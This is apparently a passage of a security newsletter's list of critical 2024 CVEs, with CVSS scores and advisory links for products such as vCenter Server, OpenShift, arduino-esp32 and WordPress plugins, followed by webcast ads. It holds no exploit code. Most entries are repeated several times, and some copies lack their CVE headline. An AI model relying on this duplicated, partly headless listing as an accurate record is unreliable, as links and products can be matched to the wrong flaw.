NVD References: https://github.com/TTTJJJWWW/AHU-IoT-vulnerable/blob/main/TOTOLINK/AC1200T8/setWizardCfg.md
Product: MFASOFT Secure Authentication Server (SAS)
CVSS Score: 9.1
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-46937
NVD References:
- https://github.com/WI1D-41/IDOR-in-MFASOFT-Secure-Authentication-Server
Product: Red Hat OpenShift
CVSS Score: 9.9
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-45496
NVD References:
- https://access.redhat.com/security/cve/CVE-2024-45496
- https://bugzilla.redhat.com/show_bug.cgi?id=2308661
CVE-2024-7387 - Openshift/builder is vulnerable to command injection via path traversal allowing an attacker to execute arbitrary commands on the OpenShift node.
Product: Red Hat Openshift/builder
CVSS Score: 9.1
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-7387
NVD References:
- https://access.redhat.com/security/cve/CVE-2024-7387
- https://bugzilla.redhat.com/show_bug.cgi?id=2302259
CVE-2024-38812 - vCenter Server is vulnerable to a heap-overflow in the DCERPC protocol, allowing remote code execution by a malicious actor via a specially crafted network packet.
Product: VMware vCenter Server
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-38812
NVD References: https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/24968
CVE-2024-45798 - Arduino-esp32 is vulnerable to Poisoned Pipeline Execution (PPE) vulnerabilities affecting the `tests_results.yml` workflow and environment Variable injection.
Product: Arduino arduino-esp32
CVSS Score: 9.9
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-45798
NVD References:
- https://codeql.github.com/codeql-query-help/javascript/js-actions-command-injection
- https://github.com/espressif/arduino-esp32/security/advisories/GHSA-h52q-xhg2-6jw8
- https://securitylab.github.com/research/github-actions-preventing-pwn-requests
- https://securitylab.github.com/research/github-actions-untrusted-input
CVE-2024-8956 - The PTZOptics PT30X-SDI/NDI-xx camera before firmware 6.3.40 is vulnerable to an insufficient authentication issue, allowing a remote attacker to leak sensitive data and manipulate configuration settings without proper authentication.
Product: PTZOptics PT30X-SDI/NDI-xx
CVSS Score: 9.1
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-8956
NVD References: https://ptzoptics.com/firmware-changelog/
NVD References: https://vulncheck.com/advisories/ptzoptics-insufficient-auth
CVE-2024-43976 & CVE-2024-43978 - Super Store Finder is vulnerable to SQL Injection due to improper neutralization of special elements in SQL commands, affecting versions from n/a through 6.9.7.
Product: highwarden Super Store Finder
Active Installations: unknown
CVSS Score: 9.3 AtRiskScore 30
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-43976
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-43978
CVE-2024-44004 - WPTaskForce WPCargo Track & Trace allows SQL Injection through improper neutralization of special elements in SQL commands.
Product: WPTaskForce WPCargo Track & Trace
Active Installations: 10,000+
CVSS Score: 9.3
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-44004
NVD References: https://patchstack.com/database/vulnerability/wpcargo/wordpress-wpcargo-track-trace-plugin-7-0-6-sql-injection-vulnerability?_s_id=cve
Product: Red Hat Openshift/builder
CVSS Score: 9.1
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-7387
NVD References:
- https://access.redhat.com/security/cve/CVE-2024-7387
- https://bugzilla.redhat.com/show_bug.cgi?id=2302259
CVE-2024-38812 - vCenter Server is vulnerable to a heap-overflow in the DCERPC protocol, allowing remote code execution by a malicious actor via a specially crafted network packet.
Product: VMware vCenter Server
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-38812
NVD References: https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/24968
CVE-2024-45798 - Arduino-esp32 is vulnerable to Poisoned Pipeline Execution (PPE) vulnerabilities affecting the `tests_results.yml` workflow and environment Variable injection.
Product: Arduino arduino-esp32
CVSS Score: 9.9
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-45798
NVD References:
- https://codeql.github.com/codeql-query-help/javascript/js-actions-command-injection
- https://github.com/espressif/arduino-esp32/security/advisories/GHSA-h52q-xhg2-6jw8
- https://securitylab.github.com/research/github-actions-preventing-pwn-requests
- https://securitylab.github.com/research/github-actions-untrusted-input
CVE-2024-8956 - The PTZOptics PT30X-SDI/NDI-xx camera before firmware 6.3.40 is vulnerable to an insufficient authentication issue, allowing a remote attacker to leak sensitive data and manipulate configuration settings without proper authentication.
Product: PTZOptics PT30X-SDI/NDI-xx
CVSS Score: 9.1
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-8956
NVD References: https://ptzoptics.com/firmware-changelog/
NVD References: https://vulncheck.com/advisories/ptzoptics-insufficient-auth
CVE-2024-43976 & CVE-2024-43978 - Super Store Finder is vulnerable to SQL Injection due to improper neutralization of special elements in SQL commands, affecting versions from n/a through 6.9.7.
Product: highwarden Super Store Finder
Active Installations: unknown
CVSS Score: 9.3 AtRiskScore 30
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-43976
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-43978
CVE-2024-44004 - WPTaskForce WPCargo Track & Trace allows SQL Injection through improper neutralization of special elements in SQL commands.
Product: WPTaskForce WPCargo Track & Trace
Active Installations: 10,000+
CVSS Score: 9.3
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-44004
NVD References: https://patchstack.com/database/vulnerability/wpcargo/wordpress-wpcargo-track-trace-plugin-7-0-6-sql-injection-vulnerability?_s_id=cve
Product: VMware vCenter Server
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-38812
NVD References: https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/24968
Product: Arduino arduino-esp32
CVSS Score: 9.9
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-45798
NVD References:
- https://codeql.github.com/codeql-query-help/javascript/js-actions-command-injection
- https://github.com/espressif/arduino-esp32/security/advisories/GHSA-h52q-xhg2-6jw8
- https://securitylab.github.com/research/github-actions-preventing-pwn-requests
- https://securitylab.github.com/research/github-actions-untrusted-input
Product: PTZOptics PT30X-SDI/NDI-xx
CVSS Score: 9.1
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-8956
NVD References: https://ptzoptics.com/firmware-changelog/
NVD References: https://vulncheck.com/advisories/ptzoptics-insufficient-auth
Product: highwarden Super Store Finder
Active Installations: unknown
CVSS Score: 9.3 AtRiskScore 30
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-43976
Product: WPTaskForce WPCargo Track & Trace
Active Installations: 10,000+
CVSS Score: 9.3
NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-44004
NVD References: https://patchstack.com/database/vulnerability/wpcargo/wordpress-wpcargo-track-trace-plugin-7-0-6-sql-injection-vulnerability?_s_id=cve
Webcast: SANS 2024 ICS/OT Survey: The State of ICS/OT Cybersecurity | Wednesday, October 9, 10:30 AM ET | SANS Certified Instructor, Jason Christopher, explores the growing trends in cyber threats, vulnerabilities, and risks across industrial environments, including actionable recommendations for how organizations can improve their security posture.
How would you fix 80,000 vulnerabilities? With Sevco, an S&P 500 company realized only a small number of devices needed patches to resolve those vulns.
Webcast: General Quarters! The Impact of Cybersecurity on the Maritime Industry | Thursday, October 17, 11:30 ET | In this webcast, SANS experts will explore the critical role of cybersecurity in safeguarding maritime operations. Save your seat today!
Webcast: SANS 2024 ICS/OT Survey: The State of ICS/OT Cybersecurity | Wednesday, October 9, 10:30 AM ET | SANS Certified Instructor, Jason Christopher, explores the growing trends in cyber threats, vulnerabilities, and risks across industrial environments, including actionable recommendations for how organizations can improve their security posture.